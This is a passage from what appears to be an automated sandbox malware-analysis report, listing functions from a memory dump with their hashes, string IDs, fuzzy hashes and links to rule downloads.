                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 46fc58e1a9d766104b93235ea6497257ef12a85f9abe1eb8b9e0227104eeb7df
                                                          • Instruction ID: 63156629b6ca46ce04336c2b828f3f8a424f861c05f3fd8bdde43cb0f6b99731
                                                          • Opcode Fuzzy Hash: 46fc58e1a9d766104b93235ea6497257ef12a85f9abe1eb8b9e0227104eeb7df
                                                          • Instruction Fuzzy Hash: 833176B59153028FCB04CF19C54194ABFF1FF89294F148AEEE4889B241D770E949CF92
                                                          Function 36013536 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 8692e1b959d434ab1f332d92ff18a47503b1ebe2155cee58bbc959585ee052f5
                                                          • Instruction ID: 0b365c40f7398182c19abab8b5246649a3012cfd343e5c6ff26010f5ff9af109
                                                          • Opcode Fuzzy Hash: 8692e1b959d434ab1f332d92ff18a47503b1ebe2155cee58bbc959585ee052f5
                                                          • Instruction Fuzzy Hash: 97210139A116089FEB25DF65CA46B1ABFE1FF80B60F5145D9E8420B644CB74E848CBD2
                                                          Function 360092AF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: a1955d2e9f783080111b7b283a120cbe1d55e09811be2fcb7f5e8ce0489800f1
                                                          • Instruction ID: 8d6021ca17bf028b05dd7a1e80dfc06766f223410086a5c5ed73d68a49b31f20
                                                          • Opcode Fuzzy Hash: a1955d2e9f783080111b7b283a120cbe1d55e09811be2fcb7f5e8ce0489800f1
                                                          • Instruction Fuzzy Hash: 6FF09A32200644AFE7319B59CD06F9ABBFDEF84B10F1405A9A68693591D6A1E909CA60
                                                          Function 3604A580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: GlobalTags
                                                          • API String ID: 0-1106856819
                                                          • Opcode ID: 3ac89f4228ed852cbe24fdb0276463dde6b3b3e660951a1eaf9634674ede6c9b
                                                          • Instruction ID: ea2c9c9c83de58a1fc9aaa98d59887bbe960e369291a36a20783726b90562354
                                                          • Opcode Fuzzy Hash: 3ac89f4228ed852cbe24fdb0276463dde6b3b3e660951a1eaf9634674ede6c9b
                                                          • Instruction Fuzzy Hash: 0671ADB8E103199FEF14CF99C98269DBFF2BF48354F2180AAE405B7245EB718961CB50
                                                          Function 3601965A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                          • Instruction ID: 35652beac34d66267515a4851183399f177f39abd83327c003386d83c0fa26a3
                                                          • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                          • Instruction Fuzzy Hash: BB618CB9D00219AFEB11CFA5C942BDEBFF4EF84714F10419AE811B7250DB708A41CBA5
                                                          Function 360202F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #%u
                                                          • API String ID: 0-232158463
                                                          • Opcode ID: 72aa499f767c5659ae41dc3825036b5e223fe36b44dc46f1b03f12f13af04236
                                                          • Instruction ID: c3677252a71e6420f4e69b98a94b8a1eaa1f3113a2f286fa6732463e29ff4e50
                                                          • Opcode Fuzzy Hash: 72aa499f767c5659ae41dc3825036b5e223fe36b44dc46f1b03f12f13af04236
                                                          • Instruction Fuzzy Hash: EE714F71E002599FDB05CFA9CA82FAEBBF8BF08744F1540A5E901E7251E734E941CBA5
                                                          Function 3609F42F Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                          • Instruction ID: adf22b9493010d9c3d55ebe3ed4870bf712bf40c2f0a49aa1a1f01d3c6a3bf58
                                                          • Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                          • Instruction Fuzzy Hash: 0151BEB2504701AFE3128F55CD42FABBBE9FF84754F5049A9B640972A0DBB1ED04CB92
                                                          Function 3602E547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: EXT-
                                                          • API String ID: 0-1948896318
                                                          • Opcode ID: be64211b857506a505fe8aa2f1896a327e294b17334e2dae5e20cd62aa6f1c29
                                                          • Instruction ID: a6abc8a9c6de9eb2989a6897efc1dba9bd1f333e55d3bd6aecc98c0b02401503
                                                          • Opcode Fuzzy Hash: be64211b857506a505fe8aa2f1896a327e294b17334e2dae5e20cd62aa6f1c29
                                                          • Instruction Fuzzy Hash: A241A1719593519FE710CA61C986B5FBBD8AF8C748F4009ADF684E7280EA74C908C797
                                                          Function 3608C3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryHash
                                                          • API String ID: 0-2202222882
                                                          • Opcode ID: 39de6a1477dc94f5fd618ed9da7b910ee10b4ba77986ca27459aca6d2c2edc48
                                                          • Instruction ID: 814bf8cb1b489c1b6837f27fd1c5484690b4c7c9878976fb3e4933eb77eb9188
                                                          • Opcode Fuzzy Hash: 39de6a1477dc94f5fd618ed9da7b910ee10b4ba77986ca27459aca6d2c2edc48
                                                          • Instruction Fuzzy Hash: 204130B190012CABDB21DB50DD82FDEBBBCAB45714F1145E5AA08AB150DB309E89CFA5
                                                          Function 36099429 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: verifier.dll
                                                          • API String ID: 0-3265496382
                                                          • Opcode ID: 7bb6525ac3b69dd511b8db4a83da5cd2ee4e4e1608bcb90d2eb221e7de3a36dd
                                                          • Instruction ID: b2690c3a97dfbdd292b9e9649ed85d4bef83bdf8bd1f4443d42e42f32a46743a
                                                          • Opcode Fuzzy Hash: 7bb6525ac3b69dd511b8db4a83da5cd2ee4e4e1608bcb90d2eb221e7de3a36dd
                                                          • Instruction Fuzzy Hash: BF315BB5B103019FEB108F69D951B677BF6EB88314F9540AAE644DF391EA31CC81DB90
                                                          Function 36047425 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #
                                                          • API String ID: 0-1885708031
                                                          • Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                          • Instruction ID: 9e49f78bc7f6a104143cd945ca75424a5fb8291680302a21967874e53122caee
                                                          • Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                          • Instruction Fuzzy Hash: AB41B175A006259BEB22DF84C886BBEBFB4EF80785F1044EAE94197240DB30D941CBE1
                                                          Function 3604360F Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Flst
                                                          • API String ID: 0-2374792617
                                                          • Opcode ID: 6a24155a36596672bd51eaae4c16e5c19bf6332d6fc8112b9f6727e6d1e52104
                                                          • Instruction ID: 395e849d150a28c4d06907520f1f57dba37c168277270f8423b291b80116fce7
                                                          • Opcode Fuzzy Hash: 6a24155a36596672bd51eaae4c16e5c19bf6332d6fc8112b9f6727e6d1e52104
                                                          • Instruction Fuzzy Hash: 6C41BDB0605302DFE31ADF26C581616FFE5EF49714F9081AEE4988B281D771D885CBD5
                                                          Function 360096E0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: 3ew3ew
                                                          • API String ID: 3446177414-982314038
                                                          • Opcode ID: 13203f74e1bc8579b76bd3caa0d175647d1b6e2c37466e7a204267c121d0cd54
                                                          • Instruction ID: 45dfcaa009f87b68273120f1aa91e031c21e8cd6f4f5b4b3ba249f50dec889f4
                                                          • Opcode Fuzzy Hash: 13203f74e1bc8579b76bd3caa0d175647d1b6e2c37466e7a204267c121d0cd54
                                                          • Instruction Fuzzy Hash: B921CF76900710AFE7218F5AC841B1A7FF5FB84B54F1118A9A6999B341DB30D901CFD1
                                                          Function 3608C6F2 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryName
                                                          • API String ID: 0-215506332
                                                          • Opcode ID: d3fab1c07030efc05930a9e3184861439c1b18a7b8dd29ba45a1b07bd625d137
                                                          • Instruction ID: c629d4bace4ef9857caf2dfd954126fe1dc8e8f846687c231c57d9ea34d6539f
                                                          • Opcode Fuzzy Hash: d3fab1c07030efc05930a9e3184861439c1b18a7b8dd29ba45a1b07bd625d137
                                                          • Instruction Fuzzy Hash: B731017AD00619AFEB16CB59C946E6FBFF4EF82B20F1141A9E901A7250D7309E04C7E0
                                                          Function 36022760 Relevance: .6, Instructions: 605COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 561b46118abd95379417ee15a1b6534f66f4ce7102c42680a57294336c4d77c5
                                                          • Instruction ID: 1335f6549df6b1ed80e4d238aa9f5cd92f73ce293bd55d4eebf9c038cbfe594c
                                                          • Opcode Fuzzy Hash: 561b46118abd95379417ee15a1b6534f66f4ce7102c42680a57294336c4d77c5
                                                          • Instruction Fuzzy Hash: 42322274E207588FEB14CFA6C8527AEBFF2BF84344F20419DD4469B280DB34A862CB54
                                                          Function 360D124C Relevance: .6, Instructions: 571COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d0b12f8eadc53c2c23974f36c71a0f502ddfe0242a3d8c43a832146264698255
                                                          • Instruction ID: e34d0aa6ef29609cd7336aace7700fab9ac1120620775f34d7c0c988bdfa6d0e
                                                          • Opcode Fuzzy Hash: d0b12f8eadc53c2c23974f36c71a0f502ddfe0242a3d8c43a832146264698255
                                                          • Instruction Fuzzy Hash: 39227E75E003168FDB09CF59C491AAEBFF2BF89348B2486E9D855DB345DB30A941CB90
                                                          Function 36008347 Relevance: .4, Instructions: 380COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 35c71734362fe48f98b951d8fbbaf7c74fcb49759ec8d738ed4949d484ab030e
                                                          • Instruction ID: 9a32f2ea24c325852d24e6ac94eef01ff6c0be472e8875342066abe045d4512e
                                                          • Opcode Fuzzy Hash: 35c71734362fe48f98b951d8fbbaf7c74fcb49759ec8d738ed4949d484ab030e
                                                          • Instruction Fuzzy Hash: 3CD1DBB5A0031A9BEF04CF66C8C2AAE7BF5FF44348F5541A9E9159B280EB30D945CB90
                                                          Function 3601D700 Relevance: .3, Instructions: 342COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7312ef0ef1cb30eefde2a023d63c5947780ffb1067bdd41c99fd547044d0f0ff
                                                          • Instruction ID: 52bc1a57ef2de440c6c544386746df2735eedf661459d0aefbb2856803e37ed6
                                                          • Opcode Fuzzy Hash: 7312ef0ef1cb30eefde2a023d63c5947780ffb1067bdd41c99fd547044d0f0ff
                                                          • Instruction Fuzzy Hash: EAC1C479E103169FEB18CF69C852B9EBBF1EF44354F548299E824AB2C0D770E941CB94
                                                          Function 36051763 Relevance: .3, Instructions: 322COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2541e3eead2c26643fdb6e6dac28f7e2200693327103d4cf9a80d7f2803b3056
                                                          • Instruction ID: 6f1b4b423f51e082f2ee930dca502b91175e8d33b10be3b288f528c90154574e
                                                          • Opcode Fuzzy Hash: 2541e3eead2c26643fdb6e6dac28f7e2200693327103d4cf9a80d7f2803b3056
                                                          • Instruction Fuzzy Hash: 1ED134B59002049FEB51DF68CA81B9A7FF9BF08344F1544BAEE499B216E731D944CBA0
                                                          Function 3602F380 Relevance: .3, Instructions: 321COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 75fa01fe68842301f520c8033526d236dd104127a11abbcaf71d1ada57f5719d
                                                          • Instruction ID: 278372672b8a3f7eda5ca0bcd1c3da04c1f5349a8a16d565acd7e3b81b9a9b2c
                                                          • Opcode Fuzzy Hash: 75fa01fe68842301f520c8033526d236dd104127a11abbcaf71d1ada57f5719d
                                                          • Instruction Fuzzy Hash: 1AC112B5E40231CFEB04CF1AC59276DBBE1FF48B88F5580DAEA419B291D7708991C7A0
                                                          Function 360137E4 Relevance: .3, Instructions: 303COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c25d0f13b6407ab26058c35a9f344e4d2f6c2bc2029f1d466b710675187c85cd
                                                          • Instruction ID: 9635e4158e98b5fe929334462a5f022e4abbd340d961296f6f5931ceee46cd5b
                                                          • Opcode Fuzzy Hash: c25d0f13b6407ab26058c35a9f344e4d2f6c2bc2029f1d466b710675187c85cd
                                                          • Instruction Fuzzy Hash: 8FC146B59007059FDB19CFA9C982A9EBFF5FB48744F1044AAE506EB350EB34A901CF90
                                                          Function 36020445 Relevance: .3, Instructions: 300COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                          • Instruction ID: 6ae9f528804ce5926260e4ed207203da433ee300d7ab262ab98a394b959e9f53
                                                          • Opcode Fuzzy Hash: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                          • Instruction Fuzzy Hash: 79B13671B007159FEB15CBA5CA92B6EBFF6AF84314F1045E8D5929B280DB30DD80CBA5
                                                          Function 360182E0 Relevance: .3, Instructions: 281COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 12ec940656509d42af20308d2f5bd989c35a97931a060c4c25ffa269188e6a0d
                                                          • Instruction ID: c65d806ebd94a7bd7087028e7158c860255755829472479987d667b3394617bb
                                                          • Opcode Fuzzy Hash: 12ec940656509d42af20308d2f5bd989c35a97931a060c4c25ffa269188e6a0d
                                                          • Instruction Fuzzy Hash: D0C15A785083408FE360CF15C495BABBBE5FF88344F5449ADE98987290DB74EA49CF92
                                                          Function 3600C3C7 Relevance: .3, Instructions: 280COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4906c23f8d9cbe9592041f6f9e178e28cf87652508b6a1e3c03404a9fa90ef79
                                                          • Instruction ID: 22042f7773530f6f462817f30910b21a25f2a8c40fb30233fec56bd7f68cf2b5
                                                          • Opcode Fuzzy Hash: 4906c23f8d9cbe9592041f6f9e178e28cf87652508b6a1e3c03404a9fa90ef79
                                                          • Instruction Fuzzy Hash: F8B1A178A002658BEB24CF65CD91BADB7F1EF45744F1085EAD44AAB290EB309DC5CF21
                                                          Function 360500A5 Relevance: .3, Instructions: 276COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3599e46c737e3146a78bc8cb32e1af45496e8ae40217545121875a50cb925b3a
                                                          • Instruction ID: 8656aed8a701c3d68b226db6ef73fda47f3ca3266122a2b273bcd6e02ef01b0c
                                                          • Opcode Fuzzy Hash: 3599e46c737e3146a78bc8cb32e1af45496e8ae40217545121875a50cb925b3a
                                                          • Instruction Fuzzy Hash: F0A10174B04716DFEB14DF69CA82BAEBBF5FF44344F5100A9EA5697280DB34A815CB80
                                                          Function 360E4080 Relevance: .3, Instructions: 275COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
